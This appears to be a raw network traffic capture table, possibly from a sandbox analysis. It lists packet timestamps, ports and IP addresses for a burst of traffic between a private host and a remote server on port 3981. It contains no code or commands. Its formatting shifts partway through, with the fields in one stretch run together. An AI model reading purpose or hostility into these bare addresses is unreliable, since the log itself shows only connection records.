Jul 1, 2024 16:20:09.675942898 CEST  60921  80  192.168.2.9  178.237.33.50
Jul 1, 2024 16:20:09.677609921 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.677650928 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.677661896 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.677689075 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.677711964 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.677723885 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.677725077 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.677737951 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.677759886 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678006887 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678049088 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678056002 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678064108 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678092003 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678103924 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678185940 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678235054 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678244114 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678255081 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678266048 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678298950 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678333998 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678376913 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678539991 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678585052 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678600073 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678625107 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678716898 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678733110 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678747892 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678759098 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678764105 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678791046 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678874969 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678885937 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678900957 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678911924 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.678915024 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.678953886 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.679374933 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679421902 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.679423094 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679435015 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679472923 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.679553032 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679564953 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679575920 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679589033 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679605961 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.679620981 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.679702997 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679714918 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679730892 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.679773092 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.685503006 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.685575008 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.685822010 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.721395969 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.721481085 CEST  60920  3981  192.168.2.9  206.123.148.194
Jul 1, 2024 16:20:09.721513987 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.721527100 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.721538067 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.721549034 CEST  3981  60920  206.123.148.194  192.168.2.9
Jul 1, 2024 16:20:09.721560955 CEST  3981  60920  206.123.148.194  192.168.2.9
                                        Jul 1, 2024 16:20:09.721571922 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.721574068 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.721609116 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.721636057 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.722316027 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.722331047 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.722342968 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.722378016 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.732741117 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.732801914 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733000040 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733011961 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733023882 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733036041 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733047962 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733055115 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733061075 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733087063 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733114004 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733143091 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733154058 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733165026 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733176947 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733186960 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733191013 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733201027 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733212948 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733217001 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733231068 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733237028 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733246088 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733272076 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733624935 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733635902 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733645916 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733658075 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733669043 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733674049 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733680964 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733691931 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733699083 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733704090 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.733726025 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.733747005 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.734581947 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734602928 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734613895 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734632015 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.734661102 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.734723091 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734735012 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734746933 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734760046 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734777927 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.734812021 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.734955072 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734966993 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734977007 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.734988928 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735007048 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735016108 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735038996 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735189915 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735213041 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735224009 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735250950 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735280991 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735302925 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735315084 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735325098 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735337019 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735357046 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735378981 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735498905 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735510111 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735521078 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735542059 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735551119 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735584021 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735614061 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735915899 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735965967 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.735974073 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.735985994 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736023903 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.736177921 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736187935 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736198902 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736212015 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736233950 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.736258984 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.736419916 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736433983 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736445904 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736457109 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736469030 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736479044 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.736495972 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.736886024 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.736937046 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776190996 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776266098 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776278973 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776290894 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776303053 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776319027 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776376963 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776411057 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776422977 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776437044 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776447058 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776452065 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776467085 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776469946 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776499033 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776552916 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776563883 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776575089 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776587009 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776597023 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776622057 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776688099 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776699066 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776710987 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776736021 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776834965 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776846886 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776861906 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776870012 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776874065 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776889086 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776899099 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776906013 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776916981 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776927948 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776928902 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776940107 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.776951075 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.776952028 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777019978 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777374029 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777385950 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777401924 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777411938 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777417898 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777424097 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777436018 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777436972 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777447939 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777463913 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777484894 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.778894901 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.778918982 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.778929949 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.778954983 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.779067993 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779079914 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779090881 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779104948 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779113054 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.779129028 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.813545942 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813570023 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813584089 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813595057 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813606977 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813617945 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813618898 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.813632011 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813669920 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.813693047 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822501898 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822535038 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822545052 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822578907 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822628021 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822639942 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822650909 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822664022 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822675943 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822690964 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822767019 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822788000 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822807074 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822890043 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822901011 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822912931 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822930098 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822961092 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823057890 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823067904 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823079109 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823090076 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823105097 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823128939 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823220015 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823230028 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823241949 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823252916 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823270082 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823290110 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823506117 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823560953 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823571920 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823601007 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823693991 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823704958 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823717117 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823729038 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823736906 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823755980 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823868990 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823879004 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823889017 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823900938 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823911905 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823913097 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823930979 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823951006 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824539900 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824552059 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824563980 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824574947 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824585915 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824592113 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824599981 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824618101 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824661016 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824696064 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824707985 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824717999 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824728966 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824739933 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824748039 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824754000 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824774027 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824795961 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825367928 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825407982 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825419903 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825448990 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825536966 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825551987 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825562954 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825577974 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825581074 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825603008 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825685978 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825696945 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825707912 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825726032 CEST609203981192.168.2.9206.123.148.194
Jul 1, 2024 16:20:09.825747967 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.828510046 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828543901 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828556061 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828596115 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.828608036 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828619003 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828629971 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828643084 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828655958 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.828675985 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.828721046 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.828761101 CEST | 60920 | 3981 | 192.168.2.9 | 206.123.148.194
Jul 1, 2024 16:20:09.867362976 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867383003 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867394924 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867408037 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
Jul 1, 2024 16:20:09.867479086 CEST | 3981 | 60920 | 206.123.148.194 | 192.168.2.9
